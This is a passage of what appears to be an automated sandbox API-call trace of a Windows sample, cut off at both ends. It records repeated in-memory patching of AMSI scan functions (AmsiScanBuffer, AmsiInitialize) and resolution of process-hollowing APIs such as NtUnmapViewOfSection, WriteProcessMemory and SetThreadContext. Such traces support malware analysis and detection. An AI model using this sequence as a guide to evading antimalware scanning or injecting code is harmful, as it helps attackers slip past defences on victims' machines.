lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.794] GetCurrentProcess () returned 0xffffffff [0125.794] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.794] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.794] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.794] VirtualProtect (in: lpAddress=0x4d20000, dwSize=0x800, flNewProtect=0x2, lpflOldProtect=0x416fd90 | out: lpflOldProtect=0x416fd90*=0x4) returned 1 [0125.795] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.795] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.795] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiUacScan") returned 0x6f874360 [0125.795] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.796] GetCurrentProcess () returned 0xffffffff [0125.796] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.796] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.796] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.797] VirtualAlloc (lpAddress=0x4d21000, dwSize=0x24800, flAllocationType=0x1000, flProtect=0x4) returned 0x4d21000 [0125.800] VirtualAlloc (lpAddress=0x4d46000, dwSize=0x2a00, flAllocationType=0x1000, flProtect=0x4) returned 0x4d46000 [0125.800] VirtualAlloc (lpAddress=0x4d49000, dwSize=0x1a00, flAllocationType=0x1000, flProtect=0x4) returned 0x4d49000 [0125.801] VirtualAlloc (lpAddress=0x4d4b000, dwSize=0x36a0, flAllocationType=0x1000, flProtect=0x4) returned 0x4d4b000 [0125.801] VirtualAlloc (lpAddress=0x4d4f000, dwSize=0x1600, flAllocationType=0x1000, flProtect=0x4) returned 0x4d4f000 [0125.802] VirtualAlloc (lpAddress=0x4d51000, dwSize=0x2e00, flAllocationType=0x1000, flProtect=0x4) returned 0x4d51000 [0125.802] VirtualAlloc (lpAddress=0x4d54000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x4d54000 [0125.803] VirtualAlloc (lpAddress=0x4d55000, dwSize=0x2e800, flAllocationType=0x1000, flProtect=0x4) returned 0x4d55000 [0125.806] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.807] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.807] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0125.807] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.808] GetCurrentProcess () returned 0xffffffff [0125.808] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.808] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.808] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.809] SetErrorMode (uMode=0x8000) returned 0x0 [0125.809] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76680000 [0125.809] SetErrorMode (uMode=0x0) returned 0x8000 [0125.810] GetProcAddress (hModule=0x76680000, lpProcName="SysFreeString") returned 0x76699d40 [0125.810] GetProcAddress (hModule=0x76680000, lpProcName="SysReAllocStringLen") returned 0x766949e0 [0125.810] GetProcAddress (hModule=0x76680000, lpProcName="SysAllocStringLen") returned 0x76699c00 [0125.810] SetErrorMode (uMode=0x8000) returned 0x0 [0125.810] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76600000 [0125.811] SetErrorMode (uMode=0x0) returned 0x8000 [0125.811] GetProcAddress (hModule=0x76600000, lpProcName="RegQueryValueExA") returned 0x7661f500 [0125.811] GetProcAddress (hModule=0x76600000, lpProcName="RegOpenKeyExA") returned 0x7661f790 [0125.811] GetProcAddress (hModule=0x76600000, lpProcName="RegCloseKey") returned 0x7661f620 [0125.811] SetErrorMode (uMode=0x8000) returned 0x0 [0125.811] LoadLibraryA (lpLibFileName="user32.dll") returned 0x743d0000 [0125.812] SetErrorMode (uMode=0x0) returned 0x8000 [0125.812] GetProcAddress (hModule=0x743d0000, lpProcName="GetKeyboardType") returned 0x7442cd00 [0125.813] GetProcAddress (hModule=0x743d0000, lpProcName="DestroyWindow") returned 0x744092b0 [0125.813] GetProcAddress (hModule=0x743d0000, lpProcName="LoadStringA") returned 0x743ffd20 [0125.813] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0 [0125.813] GetProcAddress (hModule=0x743d0000, lpProcName="CharNextA") returned 0x743fe240 [0125.813] SetErrorMode (uMode=0x8000) returned 0x0 [0125.814] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0125.814] SetErrorMode (uMode=0x0) returned 0x8000 [0125.814] GetProcAddress (hModule=0x76720000, lpProcName="GetACP") returned 0x76738500 [0125.814] GetProcAddress (hModule=0x76720000, lpProcName="Sleep") returned 0x76737990 [0125.814] GetProcAddress (hModule=0x76720000, lpProcName="VirtualFree") returned 0x76737600 [0125.815] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0125.815] GetProcAddress (hModule=0x76720000, lpProcName="GetTickCount") returned 0x76745eb0 [0125.815] GetProcAddress (hModule=0x76720000, lpProcName="QueryPerformanceCounter") returned 0x767338a0 [0125.815] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentThreadId") returned 0x76731b90 [0125.815] GetProcAddress (hModule=0x76720000, lpProcName="InterlockedDecrement") returned 0x76742a20 [0125.816] GetProcAddress (hModule=0x76720000, lpProcName="InterlockedIncrement") returned 0x76742a00 [0125.816] GetProcAddress (hModule=0x76720000, lpProcName="VirtualQuery") returned 0x76737a90 [0125.816] GetProcAddress (hModule=0x76720000, lpProcName="WideCharToMultiByte") returned 0x76733880 [0125.816] GetProcAddress (hModule=0x76720000, lpProcName="MultiByteToWideChar") returned 0x76732ad0 [0125.816] GetProcAddress (hModule=0x76720000, lpProcName="lstrlenA") returned 0x76738c80 [0125.817] GetProcAddress (hModule=0x76720000, lpProcName="lstrcpynA") returned 0x7673fe40 [0125.817] GetProcAddress (hModule=0x76720000, lpProcName="LoadLibraryExA") returned 0x7673a270 [0125.817] GetProcAddress (hModule=0x76720000, lpProcName="GetThreadLocale") returned 0x7673af90 [0125.817] GetProcAddress (hModule=0x76720000, lpProcName="GetStartupInfoA") returned 0x76739c10 [0125.818] GetProcAddress (hModule=0x76720000, lpProcName="GetProcAddress") returned 0x767378b0 [0125.818] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleHandleA") returned 0x767399f0 [0125.818] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleFileNameA") returned 0x7673a720 [0125.818] GetProcAddress (hModule=0x76720000, lpProcName="GetLocaleInfoA") returned 0x7673e7b0 [0125.818] GetProcAddress (hModule=0x76720000, lpProcName="GetCommandLineA") returned 0x7673ab60 [0125.819] GetProcAddress (hModule=0x76720000, lpProcName="FreeLibrary") returned 0x76739f50 [0125.819] GetProcAddress (hModule=0x76720000, lpProcName="FindFirstFileA") returned 0x76746920 [0125.819] GetProcAddress (hModule=0x76720000, lpProcName="FindClose") returned 0x767468e0 [0125.819] GetProcAddress (hModule=0x76720000, lpProcName="ExitProcess") returned 0x76747b30 [0125.819] GetProcAddress (hModule=0x76720000, lpProcName="WriteFile") returned 0x76746ca0 [0125.820] GetProcAddress (hModule=0x76720000, lpProcName="UnhandledExceptionFilter") returned 0x76762670 [0125.820] GetProcAddress (hModule=0x76720000, lpProcName="RtlUnwind") returned 0x76738c10 [0125.820] GetProcAddress (hModule=0x76720000, lpProcName="RaiseException") returned 0x76738c20 [0125.820] GetProcAddress (hModule=0x76720000, lpProcName="GetStdHandle") returned 0x7673a6e0 [0125.820] SetErrorMode (uMode=0x8000) returned 0x0 [0125.820] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0125.821] SetErrorMode (uMode=0x0) returned 0x8000 [0125.821] GetProcAddress (hModule=0x76720000, lpProcName="TlsSetValue") returned 0x767329d0 [0125.821] GetProcAddress (hModule=0x76720000, lpProcName="TlsGetValue") returned 0x76731b70 [0125.821] GetProcAddress (hModule=0x76720000, lpProcName="TlsFree") returned 0x7673a040 [0125.822] GetProcAddress (hModule=0x76720000, lpProcName="TlsAlloc") returned 0x7673a120 [0125.822] GetProcAddress (hModule=0x76720000, lpProcName="LocalFree") returned 0x767379a0 [0125.822] GetProcAddress (hModule=0x76720000, lpProcName="LocalAlloc") returned 0x76737a30 [0125.822] SetErrorMode (uMode=0x8000) returned 0x0 [0125.822] LoadLibraryA (lpLibFileName="user32.dll") returned 0x743d0000 [0125.822] SetErrorMode (uMode=0x0) returned 0x8000 [0125.823] GetProcAddress (hModule=0x743d0000, lpProcName="ReleaseDC") returned 0x743eba40 [0125.823] GetProcAddress (hModule=0x743d0000, lpProcName="RegisterClipboardFormatA") returned 0x74406710 [0125.823] GetProcAddress (hModule=0x743d0000, lpProcName="OffsetRect") returned 0x744050c0 [0125.824] GetProcAddress (hModule=0x743d0000, lpProcName="MessageBoxA") returned 0x7444fec0 [0125.824] GetProcAddress (hModule=0x743d0000, lpProcName="LoadStringA") returned 0x743ffd20 [0125.824] GetProcAddress (hModule=0x743d0000, lpProcName="LoadIconA") returned 0x74403dd0 [0125.824] GetProcAddress (hModule=0x743d0000, lpProcName="GetSystemMetrics") returned 0x743e9160 [0125.825] GetProcAddress (hModule=0x743d0000, lpProcName="GetSysColor") returned 0x743ee7f0 [0125.825] GetProcAddress (hModule=0x743d0000, lpProcName="GetDC") returned 0x74408990 [0125.825] GetProcAddress (hModule=0x743d0000, lpProcName="CharNextW") returned 0x744071c0 [0125.825] GetProcAddress (hModule=0x743d0000, lpProcName="CharNextA") returned 0x743fe240 [0125.825] GetProcAddress (hModule=0x743d0000, lpProcName="CharUpperBuffA") returned 0x7445aba0 [0125.825] GetProcAddress (hModule=0x743d0000, lpProcName="CharToOemA") returned 0x74452cf0 [0125.826] GetProcAddress (hModule=0x743d0000, lpProcName="AdjustWindowRect") returned 0x743ff1f0 [0125.826] SetErrorMode (uMode=0x8000) returned 0x0 [0125.826] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x74ab0000 [0125.826] SetErrorMode (uMode=0x0) returned 0x8000 [0125.826] GetProcAddress (hModule=0x74ab0000, lpProcName="UnrealizeObject") returned 0x74b636e0 [0125.827] GetProcAddress (hModule=0x74ab0000, lpProcName="SetTextColor") returned 0x74b31d00 [0125.827] GetProcAddress (hModule=0x74ab0000, lpProcName="SetROP2") returned 0x74b55450 [0125.827] GetProcAddress (hModule=0x74ab0000, lpProcName="SetBkMode") returned 0x74b320d0 [0125.827] GetProcAddress (hModule=0x74ab0000, lpProcName="SetBkColor") returned 0x74b31e20 [0125.828] GetProcAddress (hModule=0x74ab0000, lpProcName="SelectPalette") returned 0x74b65b50 [0125.828] GetProcAddress (hModule=0x74ab0000, lpProcName="SelectObject") returned 0x74b30440 [0125.828] GetProcAddress (hModule=0x74ab0000, lpProcName="MoveToEx") returned 0x74b4d3a0 [0125.828] GetProcAddress (hModule=0x74ab0000, lpProcName="GetTextMetricsA") returned 0x74b4c320 [0125.828] GetProcAddress (hModule=0x74ab0000, lpProcName="GetSystemPaletteEntries") returned 0x74b635e0 [0125.829] GetProcAddress (hModule=0x74ab0000, lpProcName="GetStockObject") returned 0x74b32550 [0125.829] GetProcAddress (hModule=0x74ab0000, lpProcName="GetDeviceCaps") returned 0x74b30fe0 [0125.829] GetProcAddress (hModule=0x74ab0000, lpProcName="GetCurrentPositionEx") returned 0x74b4d590 [0125.829] GetProcAddress (hModule=0x74ab0000, lpProcName="DeleteObject") returned 0x74b30810 [0125.829] GetProcAddress (hModule=0x74ab0000, lpProcName="DeleteDC") returned 0x74b30d00 [0125.830] GetProcAddress (hModule=0x74ab0000, lpProcName="CreatePenIndirect") returned 0x74b61200 [0125.830] GetProcAddress (hModule=0x74ab0000, lpProcName="CreatePalette") returned 0x74b667f0 [0125.830] GetProcAddress (hModule=0x74ab0000, lpProcName="CreateFontIndirectA") returned 0x74b4e9b0 [0125.830] GetProcAddress (hModule=0x74ab0000, lpProcName="CreateBrushIndirect") returned 0x74b54d30 [0125.830] SetErrorMode (uMode=0x8000) returned 0x0 [0125.830] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0125.831] SetErrorMode (uMode=0x0) returned 0x8000 [0125.831] GetProcAddress (hModule=0x76720000, lpProcName="lstrcmpiA") returned 0x76737830 [0125.831] GetProcAddress (hModule=0x76720000, lpProcName="_lwrite") returned 0x7675d120 [0125.831] GetProcAddress (hModule=0x76720000, lpProcName="_lcreat") returned 0x7675d090 [0125.832] GetProcAddress (hModule=0x76720000, lpProcName="_lclose") returned 0x76737a70 [0125.832] GetProcAddress (hModule=0x76720000, lpProcName="WriteProcessMemory") returned 0x76762850 [0125.832] GetProcAddress (hModule=0x76720000, lpProcName="WriteFile") returned 0x76746ca0 [0125.833] GetProcAddress (hModule=0x76720000, lpProcName="WaitForSingleObject") returned 0x76746820 [0125.833] GetProcAddress (hModule=0x76720000, lpProcName="VirtualQuery") returned 0x76737a90 [0125.834] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0125.834] GetProcAddress (hModule=0x76720000, lpProcName="VirtualFree") returned 0x76737600 [0125.834] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAllocEx") returned 0x76762730 [0125.834] GetProcAddress (hModule=0x76720000, lpProcName="VirtualAlloc") returned 0x76737810 [0125.835] GetProcAddress (hModule=0x76720000, lpProcName="Sleep") returned 0x76737990 [0125.835] GetProcAddress (hModule=0x76720000, lpProcName="SizeofResource") returned 0x76738f80 [0125.835] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadContext") returned 0x76762490 [0125.836] GetProcAddress (hModule=0x76720000, lpProcName="SetFilePointer") returned 0x76746c40 [0125.836] GetProcAddress (hModule=0x76720000, lpProcName="SetEvent") returned 0x767467d0 [0125.836] GetProcAddress (hModule=0x76720000, lpProcName="SetErrorMode") returned 0x76738d20 [0125.836] GetProcAddress (hModule=0x76720000, lpProcName="SetEndOfFile") returned 0x76746c00 [0125.837] GetProcAddress (hModule=0x76720000, lpProcName="ResumeThread") returned 0x7673a800 [0125.837] GetProcAddress (hModule=0x76720000, lpProcName="ResetEvent") returned 0x767467c0 [0125.837] GetProcAddress (hModule=0x76720000, lpProcName="ReadProcessMemory") returned 0x76761c80 [0125.838] GetProcAddress (hModule=0x76720000, lpProcName="ReadFile") returned 0x76746bb0 [0125.838] GetProcAddress (hModule=0x76720000, lpProcName="QueryPerformanceFrequency") returned 0x76738cc0 [0125.838] GetProcAddress (hModule=0x76720000, lpProcName="OpenProcess") returned 0x76738bf0 [0125.838] GetProcAddress (hModule=0x76720000, lpProcName="MultiByteToWideChar") returned 0x76732ad0 [0125.839] GetProcAddress (hModule=0x76720000, lpProcName="MulDiv") returned 0x76746480 [0125.839] GetProcAddress (hModule=0x76720000, lpProcName="LockResource") returned 0x76737890 [0125.839] GetProcAddress (hModule=0x76720000, lpProcName="LoadResource") returned 0x767376f0 [0125.840] GetProcAddress (hModule=0x76720000, lpProcName="LoadLibraryA") returned 0x76744bf0 [0125.840] GetProcAddress (hModule=0x76720000, lpProcName="LeaveCriticalSection") returned 0x7720f210 [0125.840] GetProcAddress (hModule=0x76720000, lpProcName="InitializeCriticalSection") returned 0x7722a200 [0125.840] GetProcAddress (hModule=0x76720000, lpProcName="GetVersionExA") returned 0x7673a700 [0125.841] GetProcAddress (hModule=0x76720000, lpProcName="GetThreadLocale") returned 0x7673af90 [0125.841] GetProcAddress (hModule=0x76720000, lpProcName="GetThreadContext") returned 0x7673ec60 [0125.841] GetProcAddress (hModule=0x76720000, lpProcName="GetStdHandle") returned 0x7673a6e0 [0125.841] GetProcAddress (hModule=0x76720000, lpProcName="GetProcAddress") returned 0x767378b0 [0125.842] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleHandleA") returned 0x767399f0 [0125.842] GetProcAddress (hModule=0x76720000, lpProcName="GetModuleFileNameA") returned 0x7673a720 [0125.844] GetProcAddress (hModule=0x76720000, lpProcName="GetLocaleInfoA") returned 0x7673e7b0 [0125.844] GetProcAddress (hModule=0x76720000, lpProcName="GetLocalTime") returned 0x76739be0 [0125.845] GetProcAddress (hModule=0x76720000, lpProcName="GetLastError") returned 0x76733870 [0125.845] GetProcAddress (hModule=0x76720000, lpProcName="GetFullPathNameA") returned 0x76746ad0 [0125.845] GetProcAddress (hModule=0x76720000, lpProcName="GetFileAttributesA") returned 0x76746a20 [0125.845] GetProcAddress (hModule=0x76720000, lpProcName="GetExitCodeThread") returned 0x76744f40 [0125.845] GetProcAddress (hModule=0x76720000, lpProcName="GetDiskFreeSpaceA") returned 0x767469c0 [0125.846] GetProcAddress (hModule=0x76720000, lpProcName="GetDateFormatA") returned 0x76760de0 [0125.846] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentThreadId") returned 0x76731b90 [0125.846] GetProcAddress (hModule=0x76720000, lpProcName="GetCurrentProcess") returned 0x767338c0 [0125.846] GetProcAddress (hModule=0x76720000, lpProcName="GetCPInfo") returned 0x7673a290 [0125.846] GetProcAddress (hModule=0x76720000, lpProcName="FreeLibrary") returned 0x76739f50 [0125.847] GetProcAddress (hModule=0x76720000, lpProcName="FormatMessageA") returned 0x7673f830 [0125.847] GetProcAddress (hModule=0x76720000, lpProcName="FlushInstructionCache") returned 0x76739ae0 [0125.847] GetProcAddress (hModule=0x76720000, lpProcName="FindResourceA") returned 0x7673cb90 [0125.847] GetProcAddress (hModule=0x76720000, lpProcName="ExitProcess") returned 0x76747b30 [0125.848] GetProcAddress (hModule=0x76720000, lpProcName="EnumCalendarInfoA") returned 0x7673fdf0 [0125.848] GetProcAddress (hModule=0x76720000, lpProcName="EnterCriticalSection") returned 0x7720f290 [0125.848] GetProcAddress (hModule=0x76720000, lpProcName="DeleteFileA") returned 0x767468b0 [0125.848] GetProcAddress (hModule=0x76720000, lpProcName="DeleteCriticalSection") returned 0x77220e60 [0125.849] GetProcAddress (hModule=0x76720000, lpProcName="CreateRemoteThread") returned 0x767607f0 [0125.849] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessW") returned 0x7673b000 [0125.849] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessA") returned 0x76760750 [0125.849] GetProcAddress (hModule=0x76720000, lpProcName="CreateFileA") returned 0x76746880 [0125.849] GetProcAddress (hModule=0x76720000, lpProcName="CreateEventA") returned 0x76746680 [0125.850] GetProcAddress (hModule=0x76720000, lpProcName="CreateDirectoryA") returned 0x76746850 [0125.850] GetProcAddress (hModule=0x76720000, lpProcName="CompareStringA") returned 0x7673e1c0 [0125.850] GetProcAddress (hModule=0x76720000, lpProcName="CloseHandle") returned 0x76746630 [0125.850] SetErrorMode (uMode=0x8000) returned 0x0 [0125.851] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76600000 [0125.851] SetErrorMode (uMode=0x0) returned 0x8000 [0125.851] GetProcAddress (hModule=0x76600000, lpProcName="RegSetValueExA") returned 0x76620a20 [0125.851] GetProcAddress (hModule=0x76600000, lpProcName="RegQueryValueExA") returned 0x7661f500 [0125.852] GetProcAddress (hModule=0x76600000, lpProcName="RegOpenKeyExA") returned 0x7661f790 [0125.852] GetProcAddress (hModule=0x76600000, lpProcName="RegOpenKeyA") returned 0x766209d0 [0125.852] GetProcAddress (hModule=0x76600000, lpProcName="RegFlushKey") returned 0x766212d0 [0125.853] GetProcAddress (hModule=0x76600000, lpProcName="RegCloseKey") returned 0x7661f620 [0125.853] SetErrorMode (uMode=0x8000) returned 0x0 [0125.853] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76720000 [0125.853] SetErrorMode (uMode=0x0) returned 0x8000 [0125.853] GetProcAddress (hModule=0x76720000, lpProcName="Sleep") returned 0x76737990 [0125.853] SetErrorMode (uMode=0x8000) returned 0x0 [0125.853] LoadLibraryA (lpLibFileName="winmm.dll") returned 0x6f8f0000 [0125.854] SetErrorMode (uMode=0x0) returned 0x8000 [0125.854] GetProcAddress (hModule=0x6f8f0000, lpProcName="timeEndPeriod") returned 0x6f8fca30 [0125.854] GetProcAddress (hModule=0x6f8f0000, lpProcName="timeBeginPeriod") returned 0x6f8f4330 [0125.854] SetErrorMode (uMode=0x8000) returned 0x0 [0125.854] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76680000 [0125.855] SetErrorMode (uMode=0x0) returned 0x8000 [0125.855] GetProcAddress (hModule=0x76680000, lpProcName="GetErrorInfo") returned 0x766b9590 [0125.855] GetProcAddress (hModule=0x76680000, lpProcName="SysFreeString") returned 0x76699d40 [0125.855] SetErrorMode (uMode=0x8000) returned 0x0 [0125.855] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x74dc0000 [0125.856] SetErrorMode (uMode=0x0) returned 0x8000 [0125.856] GetProcAddress (hModule=0x74dc0000, lpProcName="CoUninitialize") returned 0x763092a0 [0125.856] GetProcAddress (hModule=0x74dc0000, lpProcName="CoInitialize") returned 0x74df1930 [0125.856] SetErrorMode (uMode=0x8000) returned 0x0 [0125.856] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76680000 [0125.856] SetErrorMode (uMode=0x0) returned 0x8000 [0125.857] GetProcAddress (hModule=0x76680000, lpProcName="SafeArrayPtrOfIndex") returned 0x76693090 [0125.857] GetProcAddress (hModule=0x76680000, lpProcName="SafeArrayPutElement") returned 0x76695990 [0125.857] GetProcAddress (hModule=0x76680000, lpProcName="SafeArrayGetElement") returned 0x76695830 [0125.858] GetProcAddress (hModule=0x76680000, lpProcName="SafeArrayUnaccessData") returned 0x76692660 [0125.858] GetProcAddress (hModule=0x76680000, lpProcName="SafeArrayAccessData") returned 0x766a7d80 [0125.858] GetProcAddress (hModule=0x76680000, lpProcName="SafeArrayGetUBound") returned 0x766925b0 [0125.858] GetProcAddress (hModule=0x76680000, lpProcName="SafeArrayGetLBound") returned 0x76692a10 [0125.858] GetProcAddress (hModule=0x76680000, lpProcName="SafeArrayCreate") returned 0x766a7dd0 [0125.859] GetProcAddress (hModule=0x76680000, lpProcName="VariantChangeType") returned 0x76697230 [0125.859] GetProcAddress (hModule=0x76680000, lpProcName="VariantCopyInd") returned 0x76697070 [0125.859] GetProcAddress (hModule=0x76680000, lpProcName="VariantCopy") returned 0x766992d0 [0125.859] GetProcAddress (hModule=0x76680000, lpProcName="VariantClear") returned 0x76699570 [0125.859] GetProcAddress (hModule=0x76680000, lpProcName="VariantInit") returned 0x76692590 [0125.860] SetErrorMode (uMode=0x8000) returned 0x0 [0125.860] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0125.860] SetErrorMode (uMode=0x0) returned 0x8000 [0125.860] GetProcAddress (hModule=0x771d0000, lpProcName="NtUnmapViewOfSection") returned 0x77246f40 [0125.860] SetErrorMode (uMode=0x8000) returned 0x0 [0125.860] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74eb0000 [0125.860] SetErrorMode (uMode=0x0) returned 0x8000 [0125.861] GetProcAddress (hModule=0x74eb0000, lpProcName="ShellExecuteA") returned 0x75120210 [0125.861] SetErrorMode (uMode=0x8000) returned 0x0 [0125.861] LoadLibraryA (lpLibFileName="ntdll") returned 0x771d0000 [0125.861] SetErrorMode (uMode=0x0) returned 0x8000 [0125.862] GetProcAddress (hModule=0x771d0000, lpProcName="NtSuspendProcess") returned 0x772486c0 [0125.862] SetErrorMode (uMode=0x8000) returned 0x0 [0125.862] LoadLibraryA (lpLibFileName="URL") returned 0x6f8b0000 [0125.862] SetErrorMode (uMode=0x0) returned 0x8000 [0125.862] GetProcAddress (hModule=0x6f8b0000, lpProcName="InetIsOffline") returned 0x6f8b1430 [0125.862] SetErrorMode (uMode=0x8000) returned 0x0 [0125.862] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0125.862] SetErrorMode (uMode=0x0) returned 0x8000 [0125.863] GetProcAddress (hModule=0x76720000, lpProcName="CopyFileA") returned 0x7673f780 [0125.863] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.863] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.863] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0125.863] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.865] GetCurrentProcess () returned 0xffffffff [0125.865] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.865] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.865] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.865] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.866] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.866] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0125.866] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.867] GetCurrentProcess () returned 0xffffffff [0125.867] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.867] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.867] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.867] VirtualProtect (in: lpAddress=0x4d21000, dwSize=0x247c8, flNewProtect=0x20, lpflOldProtect=0x416fd90 | out: lpflOldProtect=0x416fd90*=0x4) returned 1 [0125.874] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.875] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.875] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0125.875] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.876] GetCurrentProcess () returned 0xffffffff [0125.876] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.876] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.876] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.877] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.877] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.877] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0125.877] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.879] GetCurrentProcess () returned 0xffffffff [0125.879] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.879] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.879] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.879] VirtualProtect (in: lpAddress=0x4d46000, dwSize=0x2978, flNewProtect=0x20, lpflOldProtect=0x416fd90 | out: lpflOldProtect=0x416fd90*=0x4) returned 1 [0125.883] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.884] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.894] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0125.894] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x4) returned 1 [0125.896] GetCurrentProcess () returned 0xffffffff [0125.896] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x23478a0, dwSize=0x5) returned 1 [0125.896] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x416fc10 | out: lpflOldProtect=0x416fc10*=0x40) returned 1 [0125.896] FreeLibrary (hLibModule=0x6f8700ff) returned 0 [0125.896] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0125.897] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0125.897] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0125.897] VirtualProtect (in: lpAddress=0x23478a0, dwSize=0x5, flNewProtect=0x40, 